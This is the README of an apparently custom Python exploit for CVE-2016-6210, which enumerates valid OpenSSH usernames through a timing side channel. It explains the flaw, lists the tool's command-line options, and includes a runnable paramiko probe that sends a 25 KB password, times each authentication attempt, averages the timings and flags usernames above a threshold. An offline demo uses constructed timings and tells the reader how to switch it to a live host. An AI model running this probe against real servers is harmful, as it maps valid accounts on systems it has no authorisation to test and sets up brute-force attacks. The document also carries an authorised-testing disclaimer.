Custom exploit (Python 2.7) for enumerating usernames via CVE-2016-6210 (OpenSSH 7.2p2 and earlier).
Only use this against systems you are authorised to test.
I wrote this program as a tool to exploit CVE-2016-6210, a user enumeration vulnerability in OpenSSH (before version 7.3) disclosed by Eddie Harari.
The root cause is that, when password authentication is attempted for a username that does not exist, sshd in these versions still hashes the supplied password, but against a fixed fake hash using a faster algorithm (Blowfish) than the SHA-256/SHA-512 crypt hashes used for real accounts. With a very long password (25 KB in this tool) the difference in hashing time becomes large enough to measure over the network, so a valid username produces a noticeably longer response time than an invalid one.
This program exploits that behaviour by sending each username from a wordlist together with the long password and measuring how long the server takes to respond. The user sets an alert threshold (in seconds); any username whose processing time exceeds it is printed along with its timing.
The user can also supply an IP or email appendage so that each entry is tested both with and without it. By default (no appendage given) each word in the wordlist is tried in the forms word and word@IP; if an appendage is given, word@IP is replaced by word@appendage.
The number of times each word is sent and timed can be set; the program then uses the average processing time for that word instead of individual timings, which makes the results more reliable against network jitter.
A delay between requests can also be set, which stops the program from sending too many requests too quickly.
Credit for most of the SSH request code in cveCode.py goes to Eddie Harari: a modified version of his code is used for sending the requests and calculating the timings. His advisory and sample code can be found here
Note: my code has only been black-box tested against OpenSSH 7.2p2 (with a Kali Linux client) and needs further testing. Timings are affected by network latency and server load, so treat a single measurement as a hint rather than a confirmation and use a higher iteration count where results look marginal. The results and parameters are controlled and interpreted by the user.
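The following is an added example of the procedure described above (expand the wordlist, send the long password per username, average the timings, alert above a threshold). It is not the repository's exploit_6210.py nor Harari's cveCode.py: the function names are mine, the network probe assumes paramiko is installed and that the target accepts password authentication, and the timings in the demo are constructed, not measured. It goes one step beyond the README by also measuring a baseline against random, almost certainly nonexistent usernames so the alert threshold can be chosen per target rather than relying on the fixed 0.1 s default.

```python
"""Timing-based username enumeration against OpenSSH before 7.3 (CVE-2016-6210).

Added example, not the repository's exploit_6210.py or Harari's cveCode.py:
the network probe is kept separate from the averaging/alerting logic so the
latter can be run and checked offline with a fake probe.
"""
import random
import socket
import string
import time
from statistics import mean

# 25 KB password: long enough that hashing it against a real user's crypt
# entry takes measurably longer than the server's fake hash for unknown users.
LONG_PASSWORD = "A" * (25 * 1024)


def candidate_usernames(words, host, appendage=None):
    """Expand wordlist entries into the forms the tool tries.

    Without an appendage each word becomes `word` and `word@HOST`; with one
    (e.g. "@example.com") it becomes `word` and `word + appendage`.  Blank
    entries are skipped and duplicates dropped, preserving order.
    """
    suffix = appendage if appendage else "@" + host
    seen, out = set(), []
    for raw in words:
        word = raw.strip()
        if not word:
            continue
        for name in (word, word + suffix):
            if name not in seen:
                seen.add(name)
                out.append(name)
    return out


def ssh_probe(host, username, password=LONG_PASSWORD, port=22, timeout=10.0):
    """Time one password-auth attempt.  Assumes paramiko is installed and the
    target allows PasswordAuthentication.  Returns seconds spent inside
    auth_password; AuthenticationException is the expected outcome."""
    import paramiko  # assumption: paramiko, as in Harari's PoC

    sock = socket.create_connection((host, port), timeout=timeout)
    transport = paramiko.Transport(sock)
    transport.start_client()  # key exchange only, no authentication yet
    start = time.perf_counter()
    try:
        transport.auth_password(username, password)
    except paramiko.AuthenticationException:
        pass
    finally:
        elapsed = time.perf_counter() - start
        transport.close()
    return elapsed


def average_timings(usernames, probe, iterations=1, delay=0.5):
    """Probe each username `iterations` times, `delay` seconds apart, and
    return {username: mean seconds}.  `probe(username) -> seconds`."""
    averages = {}
    for name in usernames:
        samples = []
        for _ in range(iterations):
            samples.append(probe(name))
            time.sleep(delay)
        averages[name] = mean(samples)
    return averages


def baseline_timing(probe, iterations=3, delay=0.5):
    """Average timing for random usernames that almost certainly do not
    exist, so the alert threshold can be set per target (an extension
    beyond the README's fixed 0.1 s default)."""
    names = ["".join(random.choices(string.ascii_lowercase, k=16))
             for _ in range(iterations)]
    return mean(average_timings(names, probe, 1, delay).values())


def flag_slow(averages, alert=0.1):
    """(username, seconds) pairs whose average exceeds `alert`, slowest first."""
    hits = [(n, t) for n, t in averages.items() if t > alert]
    return sorted(hits, key=lambda nt: nt[1], reverse=True)


if __name__ == "__main__":
    # Constructed timings standing in for a live server: real accounts take
    # ~0.3 s on the long password, unknown users ~0.02 s.  Swap fake_probe for
    # lambda n: ssh_probe("TARGET", n) to run it for real.
    FAKE = {"root": 0.31, "alice": 0.29}

    def fake_probe(name):
        return FAKE.get(name, 0.02)

    names = candidate_usernames(["root", "alice", "", "nobody_here"], "10.0.0.5")
    base = baseline_timing(fake_probe, delay=0)
    avgs = average_timings(names, fake_probe, iterations=3, delay=0)
    for name, secs in flag_slow(avgs, alert=base * 3):
        print("ALERT %-20s %.3f s (baseline %.3f s)" % (name, secs, base))
```

Run it as-is to see the offline demo; replace `fake_probe` with a call to `ssh_probe` against an authorised host to use it for real. Note that paramiko's `auth_password` includes the round trip, so the baseline against random usernames absorbs network latency and should be re-measured for each target.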
python exploit_6210.py IP_ADDRESS [-h] [-a ALERT] [-w WORDLIST] [-e EMAIL] [-av ITERATE_AMOUNT] [-d DELAY]
Where:
- IP_ADDRESS is the host you are testing the program against
- -a ALERT (optional, default 0.1) is the processing time (in seconds) above which an alert is raised for a username
- -w WORDLIST (optional, default usernamelist) is the file path of the list of usernames to test against the host
- -e EMAIL (optional) is the IP or email appendage (in the form @IP_ADDRESS or @email.com) to try on the end of each wordlist entry (note that both the entry AND entry + appendage are tried)
- -av ITERATE_AMOUNT (optional, default 1) is the number of times to query the SSH server for each username, giving more reliable timing averages (the higher the number, the longer the run takes, by a LOT)
- -d DELAY (optional, default 0.5) is the approximate delay (in seconds) between requests (the higher the number, the longer the run takes, by a LOT)